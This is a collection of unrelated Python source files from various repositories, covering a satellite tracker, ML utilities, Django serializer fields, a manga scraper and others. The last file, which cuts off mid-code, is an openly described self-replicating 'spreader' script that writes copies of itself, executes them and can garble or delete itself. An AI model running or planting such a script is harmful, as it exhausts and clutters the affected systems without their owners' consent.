parser_encrypt_binary.set_defaults(func=encrypt_binary)
parser_decrypt_binary = subparsers.add_parser('decryptbin', aliases=['db'],
help='Decrypt a message/file with binary encoding.')
parser_decrypt_binary.add_argument('sender', type=str, default=None,
help='The filename of the sender\'s public key. '
'Always defaults to the /public_keys directory.')
parser_decrypt_binary.add_argument('infile', nargs='?', type=argparse.FileType('rb'), default=sys.stdin,
help='The filename or path of the encrypted file. Defaults to stdin.')
parser_decrypt_binary.set_defaults(func=decrypt_binary)
args = parser.parse_args()
if args.func is None:
parser.print_help()
sys.exit()
args.func(args)
if __name__ == '__main__':
main()
| 2.75 | 3 |
src/predictor.py | koriavinash1/Fetal-Brain-Segmentation | 10 | 12765122 | <filename>src/predictor.py
from __future__ import division
import numpy as np
import os, shutil, sys
import SimpleITK as sitk
import glob
from datetime import datetime
import time
from estimator import *
from config import *
from networks import *
from test_utils import *
from train_utils import *
if __name__ == "__main__":
# Set Environment
conf = conf()
model_path = os.path.join(conf.output_dir, conf.run_name, 'best_model/latest.ckpt')
test_data = 'path/to/test/data'
patient_folders = next(os.walk(test_data))[1]
save_dir = os.path.join(conf.output_dir, conf.run_name, 'predictions{}'.format(time.strftime("%Y%m%d_%H%M%S")))
# if os.path.exists(save_dir):
# shutil.rmtree(save_dir)
# os.makedirs(save_dir)
# for patient in patient_folders:
# os.makedirs(os.path.join(save_dir, patient))
inputs = getInputsPlaceholder(None,None,None,conf.num_channels)
targets = getTargetsPlaceholder(None,None,None,conf.num_class)
weight_maps = tf.placeholder(tf.float32, shape=[None,None,None])
batch_class_weights = tf.placeholder(tf.float32)
# define the net
print('Defining the network')
net = UNET(inputs,
targets,
weight_maps,
num_class=conf.num_class,
n_pool=3,
n_feat_first_layer=[32],
chief_class = conf.chief_class,
weight_decay = 5e-6,
metrics_list = ['plain_dice_loss', 'dice_score_class_1', 'dice_score_class_0', 'dice_score'],
metric_to_optimize = 'plain_dice_loss',
optimizer = Adam(1e-4),
gpu_ids = [1])
# initialise the estimator with the net
print('Preparing the estimator..')
trainer = Estimator(net_obj = net,
summary_dir = '',
freq_list = [],
resume_training = False,
load_model_from = model_path,
config = conf,
prediction = True
)
sequence_path, gt_path = get_test_data_path(test_data, gt_available=False)
for i in xrange(len(sequence_path)):
print("\n-----------------------------------------------------------------------")
save_dir = 'path/to/save/prediction/'
if not os.path.exists(save_dir):
os.makedirs(save_dir)
print("Working on Patient Number", str(i), save_dir)
print("-----------------------------------------------------------------------\n")
dice = trainer.LoadandPredict(sequence_path[i], None,
preProcessList = ['normalize'],
postProcessList = ['glcc'],
crf = None,
save_path = save_dir
)
# dices.append(dice)
# print("\nAverage Dice : " + str(np.mean(dices)))
| 2.171875 | 2 |
pyinaturalist/models/observation_field.py | niconoe/pyinaturalist | 47 | 12765123 | from datetime import date, datetime
from typing import List, Union
from pyinaturalist.constants import TableRow
from pyinaturalist.converters import safe_split, try_int_or_float
from pyinaturalist.models import (
BaseModel,
LazyProperty,
Taxon,
User,
datetime_now_field,
define_model,
field,
)
# Mappings from observation field value datatypes to python datatypes
OFV_DATATYPES = {
'dna': str,
'date': date,
'datetime': datetime,
'numeric': try_int_or_float,
'taxon': int,
'text': str,
'time': str,
}
OFVValue = Union[date, datetime, float, int, str]
@define_model
class ObservationField(BaseModel):
""":fa:`tag` An observation field **definition**, based on the schema of
`GET /observation_fields <https://www.inaturalist.org/pages/api+reference#get-observation_fields>`_.
"""
allowed_values: List[str] = field(converter=safe_split, factory=list)
created_at: datetime = datetime_now_field(doc='Date and time the observation field was created')
datatype: str = field(default=None) # Enum
description: str = field(default=None)
name: str = field(default=None)
updated_at: datetime = datetime_now_field(
doc='Date and time the observation field was last updated'
)
user_id: int = field(default=None)
users_count: int = field(default=None)
uuid: str = field(default=None)
values_count: int = field(default=None)
@property
def row(self) -> TableRow:
return {
'ID': self.id,
'Type': self.datatype,
'Name': self.name,
'Description': self.description,
}
def __str__(self) -> str:
description = ': {self.description}' if self.description else ''
return f'[{self.id}] {self.name} ({self.datatype}){description}'
@define_model
class ObservationFieldValue(BaseModel):
""":fa:`tag` An observation field **value**, based on the schema of ``Observation.ofvs``
from `GET /observations <https://api.inaturalist.org/v1/docs/#!/Observations/get_observations>`_.
"""
datatype: str = field(default=None) # Enum
field_id: int = field(default=None)
name: str = field(default=None)
taxon_id: int = field(default=None)
user_id: int = field(default=None)
uuid: str = field(default=None)
value: OFVValue = field(default=None)
taxon: property = LazyProperty(
Taxon.from_json, type=Taxon, doc='Taxon that the observation field applies to'
)
user: property = LazyProperty(
User.from_json, type=User, doc='User that applied the observation field value'
)
# Unused attrbiutes
# name_ci: str = field(default=None)
# value_ci: int = field(default=None)
# Convert value by datatype
def __attrs_post_init__(self):
if self.datatype in OFV_DATATYPES and self.value is not None:
converter = OFV_DATATYPES[self.datatype]
self.value = converter(self.value)
@property
def row(self) -> TableRow:
return {
'ID': self.id,
'Type': self.datatype,
'Name': self.name,
'Value': self.value,
}
def __str__(self) -> str:
return f'{self.name}: {self.value}'
| 2.375 | 2 |
model_a/utils.py | uSasha/pydata_demo | 6 | 12765124 | import redis
class ClueLogger:
def __init__(self, block, model):
self.block = block
self.r = redis.StrictRedis('redis')
def out(self, model, value):
self.r.xadd(self.block, {'model': model, 'value': value})
| 2.515625 | 3 |
2d.py | tsmpatagonia/Real-Time-Satellite-Tracking | 0 | 12765125 | # Homework for UB DMS 423 - Fall 14
# by <NAME>
#
# Real-time Satellite Visualization
# Input Data type: TLS(Two-line element set)
# Can be found at http://www.celestrak.com/NORAD/elements/
#
# How to control:
# Click a satellite to display its orbit.
# Press H to show/hide all orbits on-screen.
# Press UP/DOWN to change satellite category.
# Press LEFT/RIGHT to adjust orbit interval for line drawing.
#
import ephem, datetime, math, urllib.request, urllib.parse, urllib.error
from pyglet.gl import *
resource = [["GlobalStar", "globalstar"]]
window = pyglet.window.Window(1024,576)
total = 50
interval = 20
batch = pyglet.graphics.Batch()
class Background:
def __init__(self, x,y, xoffset,yoffset, texturefile):
self.texture = pyglet.image.load(texturefile).get_texture()
self.vlist = pyglet.graphics.vertex_list(4, ('v2f', [xoffset,yoffset, xoffset+x,yoffset, xoffset,yoffset+y, xoffset+x,yoffset+y]), ('t2f', [0,0, 1,0, 0,1, 1,1]))
def draw(self):
glEnable(GL_BLEND)
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
glColor3f(1,1,1)
glEnable(GL_TEXTURE_2D)
glBindTexture(GL_TEXTURE_2D, self.texture.id)
glPushMatrix()
self.vlist.draw(GL_TRIANGLE_STRIP)
glPopMatrix()
glBindTexture(GL_TEXTURE_2D, 0)
glDisable(GL_TEXTURE_2D)
glDisable(GL_BLEND)
class Satellite:
def __init__(self, name, l1, l2, yoffset):
self.e = ephem.readtle("GS", l1, l2)
self.vlist = pyglet.graphics.vertex_list(4, ("v2f",[-1,1, -1,-1, 1,-1, 1,1]))
self.circle = pyglet.shapes.Circle(0, 0, 1, color=(245,120,76), batch=batch)
self.size = 3
self.showline = 0
self.yoffset = yoffset
def compute(self):
self.e.compute(datetime.datetime.utcnow())
self.long = math.degrees(float(self.e.sublong))
self.lat = math.degrees(float(self.e.sublat))
self.x = (self.long * 128/45) + 512
self.y = (self.lat * 128/45) + 256 + self.yoffset
self.label = pyglet.text.Label(self.e.name, x=7,y=0, anchor_y="center", color=(255,255,255,255))
def draw(self):
glEnable(GL_BLEND)
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
glColor4f(1,0,0,1)
self.circle.opacity = 255
glPushMatrix()
glTranslatef(self.x, self.y, 0)
glRotatef(30, 0, 0, 1)
self.label.draw()
glScalef(self.size, self.size, self.size)
#self.vlist.draw(GL_TRIANGLE_FAN)
self.circle.draw()
glPopMatrix()
glDisable(GL_TEXTURE_2D)
glDisable(GL_BLEND)
def draw_alpha(self):
glEnable(GL_BLEND)
glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
#glColor4f(.2,.7,.2,.5)
self.circle.opacity = 50
glPushMatrix()
glTranslatef(self.x, self.y, 0)
glRotatef(0, 0, 0, 0)
self.label.draw()
glScalef(40, 40, 40)
#self.vlist.draw(GL_TRIANGLE_FAN)
self.circle.draw()
glPopMatrix()
glDisable(GL_TEXTURE_2D)
glDisable(GL_BLEND)
def draw_line(self):
self.init_line()
glEnable(GL_BLEND)
glColor4f(.7,.7,.7,self.showline)
glPushMatrix()
for x in self.vline_list:
x.draw(GL_LINE_STRIP)
glPopMatrix()
glDisable(GL_BLEND)
def init_line(self):
self.lines, self.vline_list, current_line = [], [], []
for x in range(-total,total):
temp = datetime.datetime.utcnow() + datetime.timedelta(seconds=interval*x)
self.e.compute(temp)
x = (math.degrees(float(self.e.sublong)) * 128/45) + 512
y = (math.degrees(float(self.e.sublat)) * 128/45) + 256 + self.yoffset
if len(current_line) > 1:
# TO AVOID LINE FROM LEFT TO RIGHT
temp_x, temp_y = current_line[-2], current_line[-1]
if temp_x - x > 600:
# From right edge to left edge
current_line.extend((x+1024,y))
self.lines.append(current_line)
current_line = []
current_line.extend((temp_x-1024,temp_y))
elif temp_x - x < -600:
# From left edge to right edge
current_line.extend((x-1024,y))
self.lines.append(current_line)
current_line = []
current_line.extend((temp_x+1024,temp_y))
current_line.extend((x,y))
self.lines.append(current_line)
for x in self.lines:
self.vline_list.append(pyglet.graphics.vertex_list(int(len(x)/2), ("v2f", x)))
def init():
global background_map, background_banner, category_num
global text_current_set, text_current_time, text_infos, text_infos_2, text_infos_3
open_new_file(0)
category_num = 0
#background_map = Background(1024,512,0,64,"assets/blue.jpg")
#background_map = Background(1024,512,0,64,"assets/bluer.jpg")
background_map = Background(1024,512,0,64,"assets/map2_4096.png")
#background_banner = Background(1024,128,0,0,"assets/bg.png")
text_current_set = pyglet.text.Label("Sats on Screen: " + resource[category_num][0], x=15, y=42, anchor_y="center", color=(255,255,255,200))
text_current_time = pyglet.text.Label("UTC Time: " + datetime.datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S"), x=15, y=22, anchor_y="center", color=(255,255,255,200))
text_infos = pyglet.text.Label("Click a satellite to display its orbit, Press H to show/hide all orbits on-screen.", x=460, y=50, anchor_y="center", color=(255,255,255,200))
text_infos_2 = pyglet.text.Label("Press UP/DOWN to change satellite category.", x=460, y=32, anchor_y="center", color=(255,255,255,200))
text_infos_3 = pyglet.text.Label("Press LEFT/RIGHT to adjust orbit interval for line drawing.", x=460, y=14, anchor_y="center", color=(255,255,255,200))
@window.event
def on_draw():
glClear(GL_COLOR_BUFFER_BIT)
background_map.draw()
#background_banner.draw()
text_current_set.draw()
text_current_time.draw()
text_infos.draw()
text_infos_2.draw()
text_infos_3.draw()
for x in sats:
x.draw()
x.draw_alpha()
x.draw_line()
def update(dt):
global text_current_time, text_current_set
text_current_time = pyglet.text.Label("UTC Time: " + datetime.datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S"), x=15, y=22, anchor_y="center", color=(255,255,255,200))
text_current_set = pyglet.text.Label("Sats on Screen: " + resource[category_num][0], x=15, y=42, anchor_y="center", color=(255,255,255,200))
for x in sats:
x.compute()
def distance(a, b):
return (a[0] - b[0]) ** 2 + (a[1] - b[1]) ** 2
def open_new_file(num):
global source, lines, sats, show_all_line
# source = open("data/"+resource[num][1] + ".txt")
# Uncomment following lines for online access
name = resource[num][1]
url = "http://www.celestrak.com/NORAD/elements/" + name +".txt"
source = urllib.request.urlopen(url).readlines()
lines = [line.decode("utf-8").replace("\r\n", "") for line in source]
sats = []
show_all_line = 0
for x in range(int(len(lines) / 3)):
e = Satellite(lines[x * 3], lines[x * 3 + 1], lines[x * 3 + 2], 64)
e.compute()
sats.append(e)
@window.event
def on_mouse_press(x,y, dx,dy):
global show_all_line
show_all_line = 0
refresh_all_line([None])
for o in sats:
if distance((o.x,o.y), (x,y)) <= o.size ** 2:
o.showline = int(not o.showline)
refresh_all_line([o])
def refresh_all_line(withouts):
for o in sats:
for w in withouts:
if o!= w:
o.showline = show_all_line
@window.event
def on_key_press(symbol, modifiers):
global show_all_line, category_num, interval
if symbol == pyglet.window.key.H:
show_all_line = not show_all_line
refresh_all_line([None])
elif symbol == pyglet.window.key.UP:
category_num += 1
if category_num == len(resource):
category_num = 0
open_new_file(category_num)
update(0)
elif symbol == pyglet.window.key.DOWN:
category_num -= 1
if category_num == -1:
category_num = len(resource)-1
open_new_file(category_num)
update(0)
elif symbol == pyglet.window.key.LEFT:
interval -= 20
if interval < 10:
interval = 10
elif symbol == pyglet.window.key.RIGHT:
interval += 20
if interval > 500:
interval = 500
init()
pyglet.clock.schedule_interval(update, 1/1.0)
pyglet.app.run() | 3.0625 | 3 |
meridian/acupoints/quze12.py | sinotradition/meridian | 5 | 12765126 | <reponame>sinotradition/meridian<filename>meridian/acupoints/quze12.py
#!/usr/bin/python
#coding=utf-8
'''
@author: sheng
@license:
'''
SPELL=u'qūzé'
CN=u'曲泽'
NAME=u'quze12'
CHANNEL='pericardium'
CHANNEL_FULLNAME='PericardiumChannelofHand-Jueyin'
SEQ='PC3'
if __name__ == '__main__':
pass
| 1.25 | 1 |
src/detection_efffdet/utils.py | yellowdolphin/SIIM-COVID19-Detection | 153 | 12765127 | <filename>src/detection_efffdet/utils.py
import random
import os
import numpy as np
import torch
import pandas as pd
from mean_average_precision import MetricBuilder
import pickle
classes = [
'Negative for Pneumonia',
'Typical Appearance',
'Indeterminate Appearance',
'Atypical Appearance'
]
def seed_everything(seed=123):
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = True
def refine_det(boxes, labels, scores):
boxes = boxes.clip(0,1)
boxes_out = []
labels_out = []
scores_out = []
for box, label, score in zip(boxes, labels, scores):
x1, y1, x2, y2 = box
if x1==x2 or y1==y2:
continue
box = [min(x1,x2), min(y1,y2), max(x1,x2), max(y1,y2)]
boxes_out.append(box)
labels_out.append(label)
scores_out.append(score)
return boxes_out, labels_out, scores_out
def get_study_map(df, pred_dict, num_classes=6, stride=0.1):
assert num_classes in [4,6]
metric_fn = MetricBuilder.build_evaluation_metric("map_2d", async_mode=True, num_classes=num_classes)
### Study level ###
for studyid, grp in df.groupby('studyid'):
gts = []
for clsidx, clsname in enumerate(classes):
assert len(np.unique(grp[clsname].values)) == 1
if grp[clsname].values[0] == 1:
gts.append([0, 0, 1, 1, clsidx, 0, 0])
gts = np.array(gts)
study_preds = []
for _, row in grp.iterrows():
study_preds.append(pred_dict[row['imageid']])
study_preds = np.array(study_preds)
study_preds = np.mean(study_preds, axis=0)
preds = []
for clsidx in range(len(classes)):
preds.append([0, 0, 1, 1, clsidx, study_preds[clsidx]])
preds = np.array(preds)
metric_fn.add(preds, gts)
### Image level ###
if num_classes == 6:
for _, row in df.iterrows():
gts = []
arr = row['label'].split(' ')
nums = len(arr) // 6
for i in range(nums):
class_name = arr[6*i]
conf = int(arr[6*i+1])
if class_name == 'opacity':
clsid = 5
else:
clsid = 4
x1 = int(float(arr[6*i+2]))
y1 = int(float(arr[6*i+3]))
x2 = int(float(arr[6*i+4]))
y2= int(float(arr[6*i+5]))
gts.append([x1, y1, x2, y2, clsid, 0, 0])
gts = np.array(gts)
preds = np.array([[0, 0, 1, 1, 4, 1]])
metric_fn.add(preds, gts)
result = metric_fn.value(iou_thresholds=0.5, recall_thresholds=np.arange(0., 1.0+stride, stride), mpolicy='soft')
average_precision = {}
for clsid in range(num_classes):
average_precision[clsid] = []
for k, v in result.items():
if k=='mAP':
continue
for clsid in range(num_classes):
average_precision[clsid].append(v[clsid]['ap'])
output = {
'mAP': result['mAP'],
}
for clsid in range(num_classes):
average_precision[clsid] = np.mean(average_precision[clsid])
if clsid < len(classes):
output[classes[clsid]] = average_precision[clsid]
elif clsid == 4:
output['none'] = average_precision[clsid]
else:
output['opacity'] = average_precision[clsid]
return output
def save_dict(obj, name):
with open(name, 'wb') as f:
pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
def load_dict(name):
with open(name, 'rb') as f:
return pickle.load(f) | 2.203125 | 2 |
topicmodelling/hdp/ConvertTopicDisplayFormat.py | awbennett/HCA-WSI | 6 | 12765128 | """
Quick and simple python program that converts the ugly and dumb vertical display of topics
to horizontal display (1 topic per line).
Usage: ConvertTopicDisplayFormat.py
Stdin: topics.txt
Stdout: mod_topics.txt
Other Input: N/A
Other Output: N/A
Author: <NAME>
Date: Sep 11
"""
import sys
topics=[] #[[topic1], [topic2], ...]
line_id = 0
for line in sys.stdin:
data = line.strip().split()
if line_id == 0:
for i in range(0, len(data)):
topics.append([])
else:
for i in range(0, len(data)):
topic_words = topics.pop(i)
topic_words.append(data[i])
topics.insert(i, topic_words)
line_id += 1
for topic in topics:
print " ".join(topic)
| 3.671875 | 4 |
feat/tests/test_utils.py | TiankangXie/feat | 0 | 12765129 | <filename>feat/tests/test_utils.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `feat` package."""
import pytest
import pandas as pd
from pandas import DataFrame, Series
import numpy as np
from os.path import join, exists
from .utils import get_test_data_path
from feat.utils import read_facet, read_openface, read_affectiva, registration, neutral, softmax, load_h5, load_pickled_model
from nltools.data import Adjacency
import unittest
def test_utils():
sample = read_openface(join(get_test_data_path(), 'OpenFace_Test.csv'))
lm_cols = ['x_'+str(i) for i in range(0,68)]+['y_'+str(i) for i in range(0,68)]
sample_face = np.array([sample[lm_cols].values[0]])
registered_lm = registration(sample_face)
assert(registered_lm.shape==(1,136))
with pytest.raises(ValueError):
registration(sample_face, method='badmethod')
with pytest.raises(TypeError):
registration(sample_face, method = np.array([1,2,3,4]))
with pytest.raises(AssertionError):
registration([sample_face[0]])
with pytest.raises(AssertionError):
registration(sample_face[0])
with pytest.raises(AssertionError):
registration(sample_face[:,:-1])
# Test softmax
assert(softmax(0) == .5)
# Test badfile.
with pytest.raises(Exception):
load_h5("badfile.h5")
# Test loading of pickled model
out = load_pickled_model()
with pytest.raises(Exception):
load_pickled_model("badfile.pkl") | 2.1875 | 2 |
src/unicef_restlib/fields.py | unicef/unicef-restlib | 1 | 12765130 | from collections import OrderedDict
from django.utils.translation import gettext_lazy as _
from model_utils import Choices
from rest_framework import serializers
from rest_framework.fields import empty, Field, SkipField
from rest_framework.utils import model_meta
from rest_framework_recursive.fields import RecursiveField
from unicef_restlib.utils import get_attribute_smart
class builtin_field:
pass
class ModelChoiceField(serializers.PrimaryKeyRelatedField):
default_error_messages = {
'does_not_exist': _('Invalid option "{pk_value}" - option is not available.'),
}
@property
def choices(self):
if hasattr(self._choices, '__call__'):
self._choices = self._choices()
return self._choices
def get_choice(self, obj):
raise NotImplementedError
def _choices(self):
return OrderedDict(map(self.get_choice, self.get_queryset()))
class SeparatedReadWriteField(Field):
read_field = None
write_field = None
def __init__(self, read_field, write_field=builtin_field, *args, **kwargs):
super().__init__(*args, **kwargs)
self.read_field = read_field
self.write_field = write_field
# update fields from kwargs
for kwarg_name in {'label', } & set(kwargs.keys()):
setattr(self.read_field, kwarg_name, kwargs[kwarg_name])
if self.write_field is not builtin_field:
setattr(self.write_field, kwarg_name, kwargs[kwarg_name])
def to_representation(self, value):
return self.read_field.to_representation(value)
def to_internal_value(self, data):
return self.write_field.to_internal_value(data)
def get_validators(self):
return self.write_field.get_validators()
def validate_empty_values(self, data):
"""
Validate empty values, and either:
* Raise `ValidationError`, indicating invalid data.
* Raise `SkipField`, indicating that the field should be ignored.
* Return (True, data), indicating an empty value that should be
returned without any further validation being applied.
* Return (False, data), indicating a non-empty value, that should
have validation applied as normal.
"""
if data is empty:
if getattr(self.root, 'partial', False):
raise SkipField()
if self.write_field.required:
self.fail('required')
return (True, self.get_default())
if data is None:
if not self.write_field.allow_null:
self.fail('null')
return (True, None)
return (False, data)
def _build_field(self):
model = getattr(self.parent.Meta, 'model')
depth = getattr(self.parent.Meta, 'depth', 0)
info = model_meta.get_field_info(model)
# Determine any extra field arguments and hidden fields that
# should be included
extra_kwargs = self.parent.get_extra_kwargs()
extra_kwargs.update(self._kwargs)
extra_kwargs, hidden_fields = self.parent.get_uniqueness_extra_kwargs(
[self.field_name], [self], extra_kwargs
)
extra_field_kwargs = {
key: value for key, value in self._kwargs.items()
if key not in ['read_field']
}
# Determine the serializer field class and keyword arguments.
field_class, field_kwargs = self.parent.build_field(
self.field_name, info, model, depth
)
# Include any kwargs defined in `Meta.extra_kwargs`
extra_field_kwargs.update(
extra_kwargs.get(self.field_name, {})
)
field_kwargs = self.parent.include_extra_kwargs(
field_kwargs, extra_field_kwargs
)
# Create the serializer field.
return field_class(**field_kwargs)
def bind(self, field_name, parent):
super().bind(field_name, parent)
self.read_field.bind(field_name, parent)
if self.write_field is builtin_field:
self.write_field = self._build_field()
self.write_field.bind(field_name, parent)
class WriteListSerializeFriendlyRecursiveField(RecursiveField):
@property
def proxied(self):
self._proxied = super().proxied
if (self._proxied and not self._proxied.context and self.bind_args[1] and self.bind_args[1].context):
self._proxied.context = self.bind_args[1].context
return self._proxied
class CommaSeparatedExportField(serializers.Field):
export_attr = None
def __init__(self, *args, **kwargs):
self.export_attr = kwargs.pop('export_attr', None)
super().__init__(*args, **kwargs)
def get_attribute(self, instance):
try:
return get_attribute_smart(instance, self.source_attrs)
except (KeyError, AttributeError) as exc:
if not self.required and self.default is empty:
raise SkipField()
msg = (
'Got {exc_type} when attempting to get a value for field '
'`{field}` on serializer `{serializer}`.\nThe serializer '
'field might be named incorrectly and not match '
'any attribute or key on the `{instance}` instance.\n'
'Original exception text was: {exc}.'.format(
exc_type=type(exc).__name__,
field=self.field_name,
serializer=self.parent.__class__.__name__,
instance=instance.__class__.__name__,
exc=exc
)
)
raise type(exc)(msg)
def to_representation(self, value):
value = set(value)
if self.export_attr:
value = [get_attribute_smart(item, self.export_attr) for item in value]
return ', '.join([str(item) for item in value if item])
class DynamicChoicesField(serializers.ChoiceField):
def __init__(self, *args, **kwargs):
self._current_choices = {}
super().__init__(*args, **kwargs)
@property
def choices(self):
return self._current_choices
@choices.setter
def choices(self, value):
self._current_choices = value
@property
def choice_strings_to_values(self):
if isinstance(self.choices, Choices):
return {k: v for k, v in self.choices}
return {
str(key): key for key in self.choices.keys()
}
@choice_strings_to_values.setter
def choice_strings_to_values(self, value):
# no need to do here anything
return
class FunctionRelatedField(serializers.RelatedField):
def __init__(self, callable_function=None, **kwargs):
assert callable_function is not None, 'The `callable_function` argument is required.'
self.callable_function = callable_function
super().__init__(**kwargs)
def to_representation(self, obj):
return self.callable_function(obj)
| 2.0625 | 2 |
constants.py | Ares513/DetectingTrollsApi | 4 | 12765131 | MAX_VECTOR_COUNT = 40*300
LEARNING_RATE = 0.001 | 1.148438 | 1 |
cyborg/urls.py | aaronbassett/django-cyborg | 4 | 12765132 | # -*- coding: utf-8 -*-
from django.conf.urls import url, include
from django.views.generic import TemplateView
cyborg_patterns = [
url(
r'^robots\.txt$',
TemplateView.as_view(
template_name='cyborg/robots.txt',
content_type='text/plain'
),
name='robots'
),
url(
r'^humans\.txt$',
TemplateView.as_view(
template_name='cyborg/humans.txt',
content_type='text/plain'
),
name='humans'
),
]
urlpatterns = [
url(r'', include(cyborg_patterns, namespace='cyborg'))
]
| 1.929688 | 2 |
app.py | chazapp/garden | 0 | 12765133 | <gh_stars>0
from flask import Flask, Blueprint, current_app
from threading import Thread
from sensors import Sensors
from lights import Lights
bp = Blueprint('metrics', __name__)
@bp.route('/metrics', methods=['GET'])
def metrics():
metrics = [{
'name': 'hygrometer',
'value': current_app.sensors.humidity.value
}, {
'name': 'temperature',
'value': current_app.sensors.temperature.value
}, {
'name': 'light',
'value': current_app.sensors.light.value
}]
out = ''
for metric in metrics:
out += "sensors{name=\"%s\"} %s\n" % (metric['name'], metric['value'])
return out
def create_app():
app = Flask(__name__)
app.sensors = Sensors()
app.lights = Lights()
app.register_blueprint(bp)
return app
if __name__ == '__main__':
app = create_app()
app.sensors.start()
app.run(port=5000)
| 2.40625 | 2 |
tankobon/sources/mangakakalot.py | onyxware/manhua | 1 | 12765134 | <reponame>onyxware/manhua
# coding: utf8
import re
from .. import models
from . import base
# mangakakalot chapter urls always end with '/chapter_(number)'.
RE_CHAPTER = re.compile(r"(\d+(\.\d+)?)")
RE_TITLE = re.compile(r"^.*: (.*)$")
class Parser(base.Parser):
domain = r"mangakakalot.com"
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._url = None
self._soup = None
def _get_soup(self, url):
if url != self._url:
self._soup = self.soup(url)
return self._soup
def metadata(self, url):
soup = self._get_soup(url)
info = soup.find(class_="manga-info-text").find_all("li")
title_tag = info[0]
title = title_tag.h1.text
alt_titles_tag = title_tag.h2.text.partition(":")[-1]
alt_titles = alt_titles_tag.split(",")
authors = [a.text.strip() for a in info[1].find_all("a")]
genres = [a.text.lower().replace(" ", "_") for a in info[6].find_all("a")]
desc_tag = soup.find("div", id=["panel-story-info-description", "noidungm"])
try:
desc_tag.p.decompose()
except AttributeError:
pass
finally:
desc = desc_tag.text
cover = soup.find("div", class_="manga-info-pic").img["src"]
print(cover)
return models.Metadata(
url=url,
title=title,
alt_titles=alt_titles,
authors=authors,
genres=genres,
desc={"en": desc},
cover=cover,
)
def add_chapters(self, manga):
soup = self._get_soup(manga.meta.url)
for tag in soup.find_all("div", class_="row"):
link = tag.span.a
if not link:
continue
url = link["href"]
cid = RE_CHAPTER.search(url.split("/")[-1]).group(1)
title = RE_TITLE.match(link["title"]).group(1)
manga.add(
models.Chapter(
id=cid,
url=url,
title=title,
)
)
def add_pages(self, chapter):
soup = self.soup(chapter.url)
chapter.pages = [
tag["src"]
for tag in soup.find("div", class_="container-chapter-reader").find_all(
"img", src=True
)
]
| 2.5 | 2 |
mlcomp/contrib/catalyst/optim/cosineanneal.py | sUeharaE4/mlcomp | 166 | 12765135 | from torch.optim.lr_scheduler import CosineAnnealingLR
class OneCycleCosineAnnealLR(CosineAnnealingLR):
def __init__(self, *args, **kwargs):
self.start_epoch = None
self.last_epoch = None
super().__init__(*args, **kwargs)
def step(self, epoch=None):
if self.last_epoch is not None:
if self.start_epoch is None:
self.start_epoch = self.last_epoch
self.last_epoch = 0
for i in range(len(self.base_lrs)):
self.optimizer.param_groups[i]['lr'] = self.base_lrs[0]
if self.last_epoch >= self.T_max - 1:
self.start_epoch = self.last_epoch
self.last_epoch = -1
for i in range(len(self.base_lrs)):
self.optimizer.param_groups[i]['lr'] = self.base_lrs[0]
super().step(epoch)
__all__ = ['OneCycleCosineAnnealLR']
| 2.25 | 2 |
ThePythonSpreader.py | 53686b/ThePythonSpreader | 0 | 12765136 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Code by: @53686b (Github/Twitter)
# Version: 1.0.1 (23/03/2021)
"""
ThePythonSpreader is a script that creates files capable of multiplying themselves.
The first file copies itself to a new file, which results of the addition of a random number
to the original file name, and then executes it. Each new file will repeat the same pattern
indefinetely.
Some customization is allowed through the settings found between lines 40 and 89.
For safety reasons the self-multiplying behavior of each copy is deactivated by default.
To activate it, check line 172.
Make sure to use it only in a safe environment, such as a disposable Virtual Machine.
*** Full responsibility for any damage caused by this script goes to the user. ***
"""
############################################################################################
###### ## ## ####### # ## ## ## ## ## # #######
###### ### # ## ###### #### ### # ### # ##### ### # ### # ##### ### ######
###### ### ######## ## ## ## # # ### # # #######
###### ######## ########### # ###### ## ## ##### ### # ### # ##### ## #######
###### ######## ### ## ## ###### ### # # ### # ## # ### ######
############################################################################################
import os
from getpass import getuser
from random import randrange
user = getuser()
############################################################################################
########################## Default Settings ##########################
############################################################################################
name , safetyDelay , randomRange = 'Spreader' , 1 , 10
# name - Name of the file.
# safetyDelay - Time it takes to create a new file. (float, seconds)
# randomRange - amount of file each new one creates.
############################################################################################
# Choose the directory where you want to create the spreader file. Must be a string.
# (Default = "c:\\Users\\" + user + "\\desktop\\")
targetDirectory = "c:\\Users\\" + user + "\\desktop\\"
############################################################################################
######################### Advanced Settings ##########################
############################################################################################
# Choose if you want to create a ReadMe file in the targetted directory.
ReadMe = False
txt = "This is a message"
############################################################################################
######### KeepSelf 0 ### DeleteContent 1 ### TurnIntoGarbage 2 ### DeleteSelf 3 #########
############################################################################################
# Choose from above, the kind of behaviour each file should have after multiplying.
fileLife = 0
############################################################################################
######################################## Size ########################################
############################################################################################
amountOfGarbage = 1 # (int, kbytes~)
# If you chose the TurnIntoGarbage option.
makeThemExtraHeavy = False
amountOfExtraGarbage = 1 # (int, kbytes~)
# makeThemExtraHeavy - Adds garbage to the files in order to make them heavier.
# This is independent from the TurnIntoGarbage option as it leaves the code alone.
############################################################################################
############################################################################################
############################################################################################
garbage , extraGarbage = "" , ""
if fileLife == 2:
garbage = """
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################"""
if makeThemExtraHeavy:
extraGarbage = """
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################"""
# Creates the ReadMe file if the option is selected.
if ReadMe:
read = open(targetDirectory + "README" + ".txt" , "w")
read.write(txt)
read.close()
# Creates the first file.
f = open(targetDirectory + name + ".py" , "w")
f.write(
# Adds the configs chosen to the DNA of the the file.
"x = " + "\"" + name + "\"" + "\n"
"y = " + str(safetyDelay) + "\n"
"z = " + str(randomRange) + "\n"
"v = " + str(fileLife) + "\n"
"t = '''" + garbage + "'''\n"
# Adds the reproductive DNA to the file.
"""
import os
from time import sleep
from random import randrange
from shutil import copyfile
i = randrange(z)
